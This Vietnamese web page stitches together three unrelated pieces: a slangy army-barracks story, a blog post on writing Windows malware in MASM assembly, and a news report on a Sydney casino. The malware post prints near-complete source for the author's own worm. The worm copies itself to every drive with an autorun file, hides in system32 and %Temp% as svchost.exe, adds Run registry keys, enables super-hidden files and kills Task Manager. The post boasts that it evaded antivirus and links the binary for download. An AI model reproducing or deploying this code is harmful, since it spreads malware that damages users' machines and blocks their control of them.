(**Lưu ý: Tên riêng trong bài chỉ có tính minh họa và điếu nhứt thiết khác tên thật.
Mọi sao chép phải ghi rõ nguồn và tác giả)
"Cô NguyễnTinhTinh".
Một lần nữa, tên Nó lại được cô Ất Ơ trên bục xướng oang oang giữa hội trường.
"Mời cô lên đại diện phát bẩu cảm nghĩ cho tuyền thể ViênSinh Luật vửa tốt nghiệp niên khóa XYZ.
Mời cô, mời cô."
Nó đĩnh đạc đường hoàng bước lên khán đài nhựn bó hoa từ một em xinh tươi.
Ôi, vinh quang là đây là đây. Hẽhẽ hẽhẽ.
Chiếc áo thụng hơi rộng dưng không mần Nó kém đi phần tự tin:
"Kính thưa..."
Cả hội trường đột ngột tối om.
"Cúp điện dồi!". Có tiếng lầm bầm bên dưới.
Gì thế nầy? Nó vưỡn chưa kịp phát biểu mệ gì mà?
Phía
dưới, tiếng keng keng vang lên lớn dần. Nó đang hoang mang bởi tiếng ồn
đó thì đột nhiên một đoàn tầu hỏa ở đâu đâm sầm vào Nó. Địt mệ, chết
anh dồi. Hu hu.
Nó giật mình tỉnh giấc. Runrẩy runrẩy. Mồ hôi vã dư tắm.
Nó vửa thoát chết một cách thần kỳ phỏng?
Không! Nó vửa mộng mị giấc ngủ trưa.
Cô TuyênTuyên, Trưởng A của nó lay mạnh nó dậy vì ngoài kia tiếng kẽng báo thức inh ỏi mà Nó vưỡn chưa bật dậy.
Ra bể rửa mặt đi cô rùi vào sắp xếp vật dụng cá nhưn. Nhanh! Cô TuyênTuyên ra lệnh cho Nó.
Nó
uể oải ra bể mần vệ sinh cá nhưn. Đấy là một cái hồ chứa quãng Ba Mét
Khối hơn tẹo, xây trên một thềm xi măng. Cao tầm Một Mét chẵn nếu đứng
trên thềm nầy. Nước được bơm từ cái giếng khơi gần đấy bằng con bơm tầu
công suất HaiNgựa.
Rãnh thoát nước chẩy thẳng ra hai cái ao cạnh bên.
Ao
nầy giồng rau muống, bón bằng phân tươi của BắnĐòm thải trực tiếp trên
hai cái cầu cá nên xanh mơn mởn mơn mởn. Cọng mới lá cũng to khác
thường. Các ông CáTrêVàng được nuôi mần tăng gia trong hai ao nầy béo
nhungnhúc nhungnhúc.
Có
một lối đi đắp đất ngăn giữa hai ao thẳng vào vườn tăng gia của Xê. Rau
giồng thời vụ thông thường là RauĐay, CảiNgọt mới RauMuống và tưới bằng
nước he he ao phân tươi kia. Vườn tăng gia gần dư hình vuông và ngăn
mới bên ngoài bằng hào bao quanh sâu quãng mét rưỡi để ôngBò ôngTrâu
không vào gặm bậy.
Câycỏ umtùm, đươngnhiên dắndít bòcạp dưới hào mênhmông mênhmông.
Có tiếng gọi giật lại từ đàng nhà BÊ. Cô VượnVượn gọi Nó.
"Cho anh mượn cái hột quẹt mồi thuốc cái."
Nó lục balô lấy quả QuẹtGa đỏ đưa cho cô VượnVượn. Nó tinh mắt nhận ra có chừng sấu, bẩy cô BắnĐòmCũ đi chung nữa.
Nó lại lục balô, lôi ra bốn gói MèoCon đưa cho cô VượnVượn.
"Gửi anh và mấy anh bên Ba XÊ hút lấy thảo. QuẹtGa nầy anh giữ đi, em có dững ba cái lận."
Cô VượnVượn hơi bỡngỡ, rồi cổ cũng cười với Nó và nhận lấy.
Cô
nầy cùng mới các Hương(*) của Cổ, aka BắnĐòmCũ(**), đến từ ThànhLong
Huyện của TàuVũng Tỉnh. Thời thởi, các cổ vửa đặt ba lô xuống mần
TânBinh, aka BắnĐòmMới(***), thì BaHai DÊ nầy đang được thống trị bởi
các các cô BắnĐòm BìnhTân khét tiếng đầugấu và hunghăng cực.
Hiển nhiên, bỏn đến từ BìnhTân Quận của thành phố ôngCụ.
Cô VượnVượn cùng mới vài cô bên Ba Xê nữa, thời gian sâu rất mến Nó.
Trong
khi hầu hết Hương của Nó đều ít nhiều đónnhận màn ChàoPhòng(****) hoặc
KhềuGiò(*****) bấtđắcdĩ từ các BắnĐòmCũ nầy, cho đến đận Nó và các Hương
của Nó lột xác thành BắnĐòmCũ khi bọn kia RaQuân, Nó vưỡn bìnhan vôsự.
Nhiều hôm cổ sang tận Hai XÊ gọi Nó qua bên Ba XÊ khề khà vài ly Đế chung mới các Hương của cổ.
Nó cố tình trước khi đi ghé CănTin mua thêm vài lít Đế, gói AnhHùng(******) mới cả đồnhắm bổsung cho phẩyđạo.
Dưng Nó đã nhầm.
Đám BắnĐòmCũ nầy điếu mót thuốc mới cả đong ké ly Đế của BắnĐòmMới bâu giờ. Phần nhiều bỏn nghĩakhí và phóngkhoáng cực.
Ba
XÊ tập trung đông các hảohán, đầugấu nhứt. Quânsố hầuhết đều là
BắnĐòmCũ. Một XÊ và Hai XÊ thì tuyền BắnĐòmMới nên tiếngnói mới cả
lựclượng, đại khái dứt chi bùbựa.
HậuCần XÊ thì không bàn, vì bỏn chỉ biết mỗi màn tháirau mới cả đúttrấu. Địt mệ, tóm lại là thậmtệ.
Qua dững lần dư thế, Nó hình dung được một số luật BấtThànhVăn giữa BắnĐòm với nhâu:
BắnĐòmMới
phải luôn xưng em gọi anh mới BắnĐòmCũ. Bỏn mặcđịnh phải ngồi chiếu
dưới. Tuổi tác, vai vế ngoài xã hội ở đây đều có nghĩa KhôngGìSất.
BắnĐòm khác ĐơnVị khi ngẫu nhiên chạm mặt nhâu, bất kể địa điểm, câu đầu môi luôn là "Qua mấy Hương ơi".
Ra
khỏi DoanhTrại mà chạm mặt lực lượng BinhVệ, aka QuânSựKiểmSoát, dù
BắnĐòm nầy có giấymá lậnlưng mới cả TácPhong đầyđủ thì cũng nên lánh mặt
từ xa. Bọn BinhVệ của ĐộiTỉnh trấn ngoài XãThị luôn căm ghét BắnĐòm của
ẾP Nhăm trấn trong nầy, và ngược lại. Không BắnĐòm nầu đủ can đảm mần
tò mò, liệu bỏn thuộc quân bên nầu cho đến khi quá muộn.
Source: somewhere on the Internet.
(Hết Phần II)
-----------
** Các từ viết tắt trong bài:
(*)Hương:
aka ĐồngChí hoặc ĐồngHương. Danh xưng giữa lính-lính với nhau nầy chỉ
phổ biến cho BắnĐòm NinhTây Tỉnh. Các vùng khác không thịnh.
(**)BắnĐòmCũ: aka Lính Cũ.
(***)BắnĐòmMới: aka Lính Mới, aka Tân binh.
(****)ChàoPhòng: aka màn TỉnRaMắt của bọn ĐạiBàng trong tù.
(*****)KhềuGiò:
BắnĐòmMới nầu bốláo hoặc mần mít lòng với BắnĐòmCũ hoặc với Hương của
nó thì banđêm khi đang ngủ, cỏn sẽ bị bọn BắnĐòmCũ vạch mùng, khều giò
gọi ra ngoài sânbóng, lùmcây, đặng ăn tỉn hội đồng. Có khi chính thằng
Trưởng A của cỏn mần màn khều giò với cỏn. Hoặc thằng Trưởng A không
muốn trực tiếp ra tay mà chọt lại với bọn kia để MượnGióBẻMăng.
BắnĐòmMới sẽ mặcđịnh giữ kín chuyện ăn tỉn hội đồng nầy dư
một trãi nghiệm tâunhã chứ không dám tốcáo thưagửi gì sất.
(******)AnhHùng: thuốc lá lậu Hero. Phổ biến nhứt vùng nầy và được most BắnĐòm chuộng
(PHẦN I)
Bâu gồm:
- Virus
- Trojan Horse
- GrayWare (Spyware; Adware; Dialer; VV)
- KeyLogger
- BackDoor
- Worm
- RootKit
- VV
Một con vi-trùng(ii) đơn giản nhất bâu gồm 3 tính năng sau:
1. Tự nhân bản vào:
+ các thư mục được chỉ định (%SystemRoot%\system32\ ; %Temp%; %VV%)
+
các phân vùng / ổ đĩa cứng (C:\; D:\; E:\; F:\; VV), USBs (USB Sticks,
Thẻ Nhớ, VV). Trừ ổ-quang(iii). Ổ đĩa mềm (ký hiệu chuẩn trước đây là
A:\) đã gần như bị khai tử nên không xét.
2. Ghi dữ liệu vào Windows Registry:
+ gán giá trị vào keyname "Run" / "RunOnce" / "RunOnceEx" của cả hai nhánh H-K-C-U(iv) và H-K-L-M(v) để khởi động cùng hệ thống.
+
vô hiệu tính năng Log-On bằng cách biên tập lại string chuẩn
"C:\WINDOWS\system32\userinit.exe," của "Userinit" trong keyname
"Winlogon" của nhánh H-K-L-M.
3. Thi hành tác vụ được chỉ định nào đó. Tỉ dư:
+ tắt tiến-trình(vi) explorer.exe
+ xóa tất cả các tệp tin có phần-mở-rộng(vii) là .MP3 hiện có trên máy tính của nạn-nhân. Tớ
có biết tí Ngôn Ngữ Assembly(ASM) và, cách đây 5 niên, tớ có thể biên
con nầy trong vòng nửa giờ cho tất cả công đoạn: biên-dịch-ra-exe >
test > packed.
Tớ quen dùng Microsoft Macro Assembler (MASM) chứ không phải Turbo Assembler(TASM).
Tại sao không phải ngôn ngữ lập trình khác: Pascal, Delphi, C / C++ / C#, Visual / Visual Basic, .NET, VV?
Dùng Assembly, ta có:
-
Tối ưu code tới từng byte mã lệnh. Bớt đi các đoạn mã trùng lập do các
ngôn ngữ lập trình bậc cao ở trên sinh ra. Tiện cho việc biên tập, quản
lý.
- Kích thước tệp tin thực-thi(viii) sau khi biên dịch luôn cho kích thước nhỏ nhất.
-
Lợi thế rất lớn cho lĩnh vực RE(ix). RE là cách thức phân tích dịch
ngược mã nguồn nhằm tìm ra bug của một chương trình bị lỗi; và hoạt động
của Meo-We một cách chính xác nhất. Vì hầu hết các công cụ debugger /
disassembler hiện nay đều dịch mã ra ngôn ngữ ASM. Bạn nắm vững ASM, bạn
đã nắm chắc 50% phần thắng. Đặc biệt đối với các Cracker; Hacker và
vXer(x), kiến thức về ASM không bao giờ là thừa.
----------------------------
(i)Meo-We aka Malware
(ii)vi-trùng aka Computer Virus(es)
(iii)ổ-quang
aka ổ-đĩa-gắn-trong (Internal Optical Drive) hoặc
ổ-đĩa-gắn-ngoài(External Optical Drive) bâu gồm CD-Rom; DVD-Rom;
Blu-Ray-Rom; HD-DVD-Rom so far.
(iv)H-K-C-U aka HKEY_CURRENT_USER.
(v)H-K-L-M aka HKEY_LOCAL_MACHINE.
H-K-C-U
và H-K-L-M là hai nhánh lưu trữ thông tin / cấu hình quan trọng bậc
nhất của hệ điều hành Windows. Hệ thống có thể dừng hoạt động nếu ta
biên tập sai dù chỉ "một con dấu" / "một từ" / "một con số" của các giá
trị quan trọng trong đó.
(vi)tiến-trình aka Process(es).
(vii)phần-mở-rộng aka Extension, tỉ dư .mp3; .ipsw; .exe, .torrent
(viii)nạn-nhân aka Victim(s)
(ix)RE aka Reverse Engineering
(x)vXer aka Virus Writers
-----------
-----------
(Phần II)
Và đây là một trong dững sản fẩm tớ mần trong thời gian còn làm nghề ngồi bàn giấy. Còn một con chuyên lây-nhiễm-qua-EXE(EXE Infection) và một con chuyên-mở-cổng-hậu(Trojan/BackDoor) giờ source-code của hai cỏn, tớ chả biết để đâu mẹ:
[.686p]
diễn
giải cho ASM hiểu ta dùng cấu trúc 80686p để biên-dịch ra
tệp-tin-thực-thi. Đúng chuẩn phải là [.386] nhưng hiện nay có nhiều
cấu-trúc CPU(của Intel) ở dạng 486 / 586 / 686 nên anh thích để ở 686
cho nó mô-đồ-tí. He he. Chữ [p] nghĩa là [Priviledged] aka Đặc-Quyền.
[.model flat, stdcall]
Win32 chỉ có mỗi mô-đồ [FLAT]. [STDCALL] là qui-ước-truyền-tham-số
[option casemap :none]
diễn giải cho ASM hiểu chữ-hoa / chữ-thường trong các nhãn API mà ta sẽ truy vấn tới.
...
...
[.data]
[.data?]
[.const]
[.code]
4 sections chứa dữ-liệu-được-khai-báo / dữ-liệu-chứa-biến / hằng-số / mã-chương-trình.
....
....
Vầu nội dung chính:
+
Chỉ định các byte đầu tiên (để các detector như PEiD, RDG Packer
Detector...) nhận diện signature của con nầy là [MASM32 / TASM32]:
INVOKE GetModuleHandle, NULL
MOV hInstance, EAX
+ Khai báo cho Procedure chính:
MalWare PROC param: LPDWORD
+ Tự nhân-bản và nạp vào biến [sTarget] với trị = 256 <=> MAX_PATH:
INVOKE GetModuleFileName, hInstance, ADDR sTarget, SIZEOF sTarget
.WHILE TRUE
+ Truy vấn tên của tất cả ổ-đĩa hiện có trên máy, hiển thị ở dạng chuỗi (C, D, E, F, ..., Z):
INVOKE GetLogicalDriveStrings, 255, ADDR sDrive
MOV EAX, 1
LEA EBX, sDrive
.WHILE EAX != 0
PUSH EBX
+ Truy vấn và phân loại các thể loại ổ-đĩa:
INVOKE GetDriveType, EBX
.IF EAX == DRIVE_FIXED || EAX == DRIVE_REMOVABLE || EAX == DRIVE_RAMDISK || EAX == DRIVE_REMOTE
+ Loại ổ-đĩa-mềm ra:
.IF BYTE PTR [EBX] != "A"
+ Thực hiện nối-chuỗi (vd: "C:\"+"X14NU4.exe" => "C:\X14NU4.exe")
INVOKE lstrcpy, ADDR File, EBX
+ Nối thêm ":\" vào sau tên mỗi ổ-đĩa ở trên:
INVOKE lstrcpy, ADDR File+3, ADDR sEXE
+ Tiến hành nhân-bản từ biến [sTarget] thành [X14NU4.exe]:
INVOKE CopyFile, ADDR sTarget, ADDR File, 0
+ Đặt thuộc tính Ẩn + Chỉ-Đọc + Hệ-Thống cho nó:
INVOKE SetFileAttributes, ADDR File, FILE_ATTRIBUTE_READONLY + FILE_ATTRIBUTE_HIDDEN + FILE_ATTRIBUTE_SYSTEM
+ Thực hiện nối-chuỗi tương tự như trên:
INVOKE lstrcpy, ADDR File+3, ADDR sAutorun
+ Kiểm tra trên root của mỗi ổ-đĩa có tồn tại tệp-tin [Autorun.inf] hay không. Nếu có, đặt lại thuộc-tính Bình-Thường cho nó:
INVOKE SetFileAttributes, ADDR File, FILE_ATTRIBUTE_NORMAL
+ Sau đó, xóa tệp nầy đi:
INVOKE DeleteFile, ADDR File
+ Kế đến là tạo tệp-tin [Autorun.inf] mới thay thế:
INVOKE CreateFile, ADDR File, GENERIC_WRITE, FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL
MOV hFile, EAX
+ Ghi dữ-liệu lên tệp-tin nầy:
INVOKE WriteFile, hFile, ADDR sContent, 149, ADDR sWrite, NULL
+ Và đặt thuộc-tính tương tự như [X14NU4.exe] ở trên:
INVOKE SetFileAttributes, ADDR File, FILE_ATTRIBUTE_READONLY + FILE_ATTRIBUTE_HIDDEN + FILE_ATTRIBUTE_SYSTEM
+ Đóng qui-trình mần việc mới tệp-tin nầy:
INVOKE CloseHandle, hFile
+ Gọi protoype tiêu-diệt-tiến-trình-Task-Manager theo như kế hoạch đã đề ra:
CALL @@Killed
.ENDIF
.ENDIF
POP EBX
ADD EBX, 4
INVOKE lstrlen, EBX
.ENDW
+ Tạm dừng trong 1/10 giây he he giải lao tí:
INVOKE Sleep, 100
.ENDW
+ Tạo vòng-lặp:
RET
MalWare ENDP
Đoạn code thực hiện kill-process [chỉ định là Windows Task Manager <=> TaskMgr.exe]:
@@Killed:
+ Mần trống-bộ-nhớ và các hàm-thủ-tục-đi-kèm:
INVOKE RtlZeroMemory, ADDR @stProcess, SIZEOF @stProcess
MOV @stProcess.dwSize, SIZEOF @stProcess
INVOKE CreateToolhelp32Snapshot, TH32CS_SNAPPROCESS, 0
MOV @hSnapShot, EAX
INVOKE Process32First, @hSnapShot, ADDR @stProcess
.While EAX
+ So sánh chuỗi [TaskMgr.exe] mới các tiến-trình trong danh sách hiển thị của Windows-Task-Manager:
INVOKE lstrcmpi, ADDR @stProcess.szExeFile, OFFSET sTaskMa
+ Nếu đúng:
.IF EAX == 0
+ Goi API OpenProcess mới tham-số [PROCESS_TERMINATE] để triệt tiến-trình trên đi:
INVOKE OpenProcess, PROCESS_TERMINATE, FALSE, @stProcess.th32ProcessID
.IF EAX
MOV EBX, EAX
INVOKE TerminateProcess, EBX, 1
INVOKE CloseHandle, EBX
.ENDIF
.ENDIF
INVOKE Process32Next, @hSnapShot, ADDR @stProcess
.EndW
INVOKE CloseHandle, @hSnapShot
+ Dùng API gọi thư-mục-chứa-tệp-tin-tạm-của-hệ-thống:
INVOKE GetTempPath, SIZEOF sDrives, ADDR sDrives
INVOKE lstrcat, ADDR sDrives, ADDR sTemp
+ Tự nhân-bản thành tệp-tin [svchost.exe] thả vầu đây:
INVOKE CopyFile, ADDR sTarget, ADDR sDrives, 0
++ Biên-tập lại Windows-Registry:
+ Tạo key khởi-động-cùng-hệ-thống cho con nầy trong nhánh H-K-L-M với các thông-số sau:
- [Key-Name] là [NTT]
- [Key-Type] là [REG_EXPAND_EZ]
- [Key-Data] là đường-dẫn [%SystemRoot%\System32\aNtHoNy.exe]
INVOKE RegCreateKey, HKEY_LOCAL_MACHINE, OFFSET sSys, ADDR @hKey
INVOKE RegSetValueEx, @hKey, ADDR sHead, NULL, REG_EXPAND_SZ, ADDR sTB, SIZEOF sTB
INVOKE RegCloseKey, @hKey
+ Hai đoạn nầy kích-hoạt-chế-độ-Super-Hidden của Microsoft-Windows. Thói bần-nông-cố-hữu của nhiều vXer. Hy hy:
INVOKE RegCreateKey, HKEY_LOCAL_MACHINE, OFFSET sSys2, ADDR @hKey
INVOKE RegSetValueEx, @hKey, ADDR sHead2, NULL, REG_SZ, ADDR sTB2, SIZEOF sTB2
INVOKE RegCloseKey, @hKey
INVOKE RegCreateKey, HKEY_LOCAL_MACHINE, OFFSET sSys3, ADDR @hKey
INVOKE RegSetValueEx, @hKey, ADDR sHead3, NULL, REG_DWORD, ADDR sTB3, SIZEOF sTB3
INVOKE RegCloseKey, @hKey
+ Tạo thêm key khởi-động-cùng-hệ-thống cho con nầy trong nhánh H-K-C-U với các thông-số sau:
- [Key-Name] là [AHTT] aka [An-Hoàng-Trung-Tướng]?
- [Key-Type] là [REG_EXPAND_EZ]]
- [Key-Data] là đường-dẫn [%Temp%\svchost.exe]
INVOKE RegCreateKey, HKEY_CURRENT_USER, OFFSET sSys, ADDR @hKey
INVOKE RegSetValueEx, @hKey, ADDR sHead4, NULL, REG_EXPAND_SZ, ADDR sTB4, SIZEOF sTB4
INVOKE RegCloseKey, @hKey
+
Dùng API GetSystemDirectory truy vấn ổ-đĩa / phân-vùng chứa HĐH. Thông
thường là [C:\Windows\system32] có phỏng? Cũng có khi HĐH được cài đặt
trên [D:\] hoặc [E:\], VV, chứ hông nhất thiết là [C:\]. Do đó để tránh
bị hớ, ta dùng hàm truy vấn nầy để có kết quả chính xác nhất: INVOKE GetSystemDirectory, OFFSET SystemPath, MAX_PATH
MOV ESI, OFFSET SystemPath
INVOKE lstrlen, ESI
MOV ECX, OFFSET sTrick
.IF BYTE PTR [ESI+EAX-1] == "\"
INC ECX
.ENDIF
INVOKE lstrcat, ESI, ECX
+ Tự nhân-bản vầu đó dưới tên [aNtHoNy.exe], đường-dẫn-chính-xác của con nầy sẽ là [C:\Windows\system32\aNtHoNy.exe]
INVOKE CopyFile, OFFSET sTarget, OFFSET SystemPath, FALSE
+ Lại đặt thuộc-tính Chỉ-Đọc + Ẩn+ Hệ-Thống cho con nầy nốt:
INVOKE SetFileAttributes, ADDR SystemPath, FILE_ATTRIBUTE_READONLY + FILE_ATTRIBUTE_HIDDEN + FILE_ATTRIBUTE_SYSTEM
XOR EAX, EAX
RET
END Start
************************************************************************
+++ Túm cái váy, nguyên-lý-hoạt-động của con Meo-We nầy như sau:
1/
Tự nhân-bản vầu root của tất cả Partition / Hard-Drive / USBs / LANs/
VV có trong hệ-thống dưới tên [X14NU4.exe] đi kèm là tệp-tin
[Autorun.inf] có nội-dung như sau:
[autorun]
open=.\X14NU4.exe
shell\1=Open
shell\1\Command=.\X14NU4.exe
shell\2\=Browser
shell\2\Command=.\X14NU4.exe
shellexecute=.\X14NU4.exe
2/ Tự nhân-bản vầu [%SystemRoot%\system32] dưới tên [aNtHoNy.exe]. Đường dẫn chính-xác là [%SystemRoot%\system32\aNtHoNy.exe]
3/ Tạo trị khởi-động-cùng-hệ-thống cho con nầy trong nhánh H-K-L-M với các thông-số sau:
+ [Key-Name] là [NTT]
+ [Key-Type] là [REG_EXPAND_EZ]
+ [Key-Data] là đường-dẫn [%SystemRoot%\System32\aNtHoNy.exe]
4/ Tự nhân-bản vầu [%Temp%] dưới tên [svchost.exe]. Đường-dẫn-chính-xác là [%Temp%\svchost.exe]
5/ Tạo trị khởi-động-cùng-hệ-thống cho con nầy trong nhánh H-K-C-U với các thông-số sau:
+ [Key-Name] là [AHTT] aka [An-Hoàng-Trung-Tướng]?
+ [Key-Type] là [REG_EXPAND_EZ]]
+ [Key-Data] là đường-dẫn [%Temp%\svchost.exe]
6/ Kích hoạt chế-độ Super-Hidden của Microsoft-Windows.
7/ Triệt tiêu tiến-trình Windows-Task-Manager.Tất cả tệp-tin trên đều được gán thuộc-tính Ẩn + Chỉ-Đọc + Hệ-Thống nhằm hạn chế sự can thiệp của người-dùng.
Vầu
thời điểm đó (đó < 2k8), con Meo-We nầy dễ dàng qua mặt hết tất cả
Anti-Virus-Trứ-Danh-Sừng-Sỏ-Nhất trong TopTen-AntiVirus, bâu gồm
Bitdefender - Kaspersky - Norton - Panda - AVG - TrendMicro - NOD32 - ETC.
************************************************************************
(PHẦN III)
Kích hoạt con nầy phát, kiểm-tra lại:
Các cô chịu khó Right-click vầu hình > Xem-Ảnh đầy đủ kích cỡ. Địt cụ thằng Bờ-Lốc-Bốt-Fò nuốc mấc một phần ảnh của anh.
Thùy-linh sản-phẩm:
http://www.x14nu4.com/Datas/X14NU4.exe
*****************************************
(PHẦN IV)
Code tool để gỡ/khắc-fục hậu-quả của con Meo-We nầy trong vòng vài nốt nhạc. He he.
Đây mới là linh-hồn của bài viết, là trọng-tâm mà anh muốn nhắn gửi đến các cô: Cách-sử-lý-Meo-We-theo-cách-thủ-công.
1/ Hủy tiến-trình của con Meo-We(X14NU4.exe) và đồng-bọn(aNtHoNy.exe + svchost.exe) ngay-tắp-lự.
2/ Xóa hai tệp-tin [X14NU4.exe] + [Autorun.inf] trên tất-cả phân-vùng / ổ-đĩa / USBs / LANs / VV.
3/ Xóa cả tệp-tin [svchost.exe] trong %Temp% và tệp-tin [aNtHoNy.exe] trong %SystemRoot%\system32.
4/ Xóa hai-trị-khởi-động-cùng-hệ-thống trong Windows-Registry là:
- Trong H-K-L-M:
+ [Key-Name] là [NTT]
+ [Key-Type] là [REG_EXPAND_EZ]
+ [Key-Data] là đường-dẫn [%SystemRoot%\System32\aNtHoNy.exe]
Và trong H-K-C-U:
+ [Key-Name] là [AHTT] aka [An-Hoàng-Trung-Tướng]?
+ [Key-Type] là [REG_EXPAND_EZ]]
+ [Key-Data] là đường-dẫn [%Temp%\svchost.exe]
5/ Tắt chức năng Super-Hidden của Microsoft-Windows bằng cách khôi-fục lại:
- [Key-Data] thành [checkbox] thay vì [radio]
trong đường-dẫn-tuyệt-đối [My Computer\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden].
- [Key-Data] thành [1] thay vì [0]
trong đường-dẫn-tuyệt-đối [My Computer\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL].
Thùy-linh của thuốc-giải:
http://www.x14nu4.com/Datas/Fix_X14NU4.exe
Tháng rồi, tỷ phú cờ bạc James Packer hân hoan loan báo tin về việc dự án xây cất một khách sạn sang trọng đến... 6 SAO, trị giá $1 Tỷ AUD và mang lại tiền thuế cho nước Úc là $114 Triệu AUD đã được chính phủ tiểu bang New South Wales(NSW) bật đèn xanh khi đồng ý việc xây dựng khách sạn 70 tầng, vừa là sòng bạc lớn tại khu vực Barangaroo ngay tại trung tâm thành phố Sydney(Sydney CBD).
Được biết Thủ hiến NSW, ông Barry O'Farrell cũng hân hoan không kém khi OK dự án xây dựng trên và trấn an sếp Packer đừng lo lắng về giấy phép tổ chức một sòng bạc thứ hai tại Sydney, được biết chỉ dành cho các khách dự chơi lắm bạc nhiều tiền từ ngoại quốc đến mà thôi. Người dân Úc dù có tiền nhiều đến mấy cũng đừng hòng bước chân vào sòng bạc tại đây.
Ngoài ra, nhiều người nói đến tình trạnh của sòng bạc Star(The Star Casino) với giấy phép độc quyền là sòng bạc duy nhất tại Sydney cho đến năm 2019, thì sòng bạc nói trên đến bao giờ mới được hoạt động?
Cơ sở mới nầy sẽ có hơn 150 bàn đánh bạc, vào khoảng phân nửa so với The Star Casino, thế nhưng chỉ hoạt động với giấy mời mà thôi đối với khách chơi sang trọng, đặc biệt là dân Á Châu tóc đen khoái đỏ đen cờ bạc mà tiếng trong nghề gọi là Những Con Cá Voi(whales).
Người ta được biết thành phần chính yếu là dân Hong Kong hay MaCao sang, có lẽ họ mang tiền nhiều như những chú cá voi khổng lồ hay chăng?
Sếp O'Farrell cho biết thêm, "Đó là sòng bạc hoạt động với giấy mời, nên những người không có giấy mời thì không thể vào những nơi nầy. Điều đó khiến cho dự án khác biệt với các phòng đánh bạc và khách mời hiện nay".
Ông còn nói rằng, chính phủ Tiểu bang sẽ không cho phép thiết lập các máy đánh bạc, còn gọi là Tướng Cướp Cụt Tay, tại đây. Cũng theo sếp Thủ hiến, "Những gì chúng ta nói ở đây là có đến 1,300 công việc trong giai đoạn xây dựng và khoảng 1,200 công việc khi khách sạn và sòng bạc hoạt động. Khi nơi nầy hoạt động đúng khả năng, nó sẽ bơm vào nền kinh tế của Tiểu bang hơn $300 Triệu AUD mỗi năm. Nó cũng thu hút giới đầu tư trên khắp thế giới đổ vào Sydney, cũng như nền du lịch sẽ phát triển mạnh mẽ".
Được biết khách sạn gồm có 350 phòng, trong đó 20% số phòng dành cho những khách đặc biệt VIP.
Ở tầng lầu trên cùng, sẽ có 75 phòng thuộc hạng sang trọng gồm các cửa hàng bán lẻ các hàng hóa hay mỹ phẩm cao cấp, nơi hội họp và một bể bơi cùng với các tiện nghi như Spa và những dịch vụ đặc biệt khác. Phòng đánh bạc của các khách VIP có tên là Sky Saloons và Mahogany Room, dĩ nhiên, với những miếng chip bằng nhựa hay các miếng bạc bằng hay hơn số lương hàng năm của một lao động bình thường trên xứ Úc nầy.
Phó Chủ tịch của sòng bạc Crown ở Melbourne là sếp Todd Nisbet cho một cuộc họp báo biết rằng, dịch vụ của khách sạn nói trên được nâng cao từ con số 5 SAO thông thường, sang 6 SAO, tức là chưa nơi nào trên thế giới có được.
Đặc biệt các nhân viên phục vụ phải biết nói nhiều thứ tiếng, đặc biệt là ngôn ngữ Quảng Đông vì khách sạn nhắm nhiều vào thành phần "Các Chú Con Trời Trung Quốc".
Người ta được biết khách sạn kiêm Casino nói trên sẽ được chấp thuận hoàn toàn trong vòng 6 tháng, với sếp Thủ hiến O'Farrell cho biết sẽ cấp giấy phép hoạt động cho sòng bạc vào đầu năm tới. Thế nhưng sòng bạc sẽ không hoạt động cho đến hết tháng 11 năm 2019, khi giấy phép độc quyền trong lãnh vực cờ bạc của The Star Casino hết hạn.
Về phía Tỷ phú Packer dĩ nhiên là hết sức hân hoan, khi đón tiếp khách mời đặt chân vào thành phố Sydney, được xem là thành phố lớn nhất và đông dân nhất nước Úc, tại một nơi chốn ăn chơi, muốn gì có nấy sang trọng đáo để vào hàng vua chúa tân thời. Ông cho rằng, "Chưa có một sòng bạc nào được xây dựng với hàng Tỷ đô la mà lại chẳng có máy đánh bạc(tức Tướng Cướp Cụt Tay). Không ai cố gắng như công ty của chúng tôi trong việc mang lại những tiện nghi đặc biệt những tiện nghi đặc biệt và điều nầy đối với tôi còn hơn cả bạc tiền. Tôi là người tin tưởng rất nhiều vào tiềm năng của Sydney".
Thế nhưng, bất chấp lời tuyên bố đầy hứa hẹn của ông sếp Tỷ phú cờ bạc, chứng khoán của Crown Casino mất giá chỉ 3 Xu chỉ còn là $9.46 mà thôi.
Bàn dân thiên hạ cho rằng, ngoài những hào nhoáng của một khách sạn 6 SAO và một sòng bạc hoành tráng thứ hai tại Sydney với số thu cho ngân sách nhà nước hàng trăm triệu đô la mỗi năm, còn số bỏ túi cho tỷ phú trẻ tuổi Packer bó buộc phải hàng chục Tỷ đô la. Nhiều người lo ngại tệ nạn xã hội vốn nhan nhản tại Sydney sẽ còn gia tăng thêm nữa, vì có thêm sòng bạc nầy.
Ngoài ra, với số thuế thu được cho ngân sách, người ta không rõ sòng bạc có trách nhiệm phải chi bao nhiêu thêm cho các dịch vụ cờ bạc quá độ?
Đó là trước đây chỉ có sòng bạc The Star, các câu lạc bộ(Club) với hàng chục ngàn máy kéo mà đã có nhiều trường hợp tan nhà nát cửa, vợ chồng con cái chia tay nhau do cờ bạc gây ra. Thử hỏi số thuế thu được của chính phủ có bù đắp được những thảm cảnh như vầy hay không??
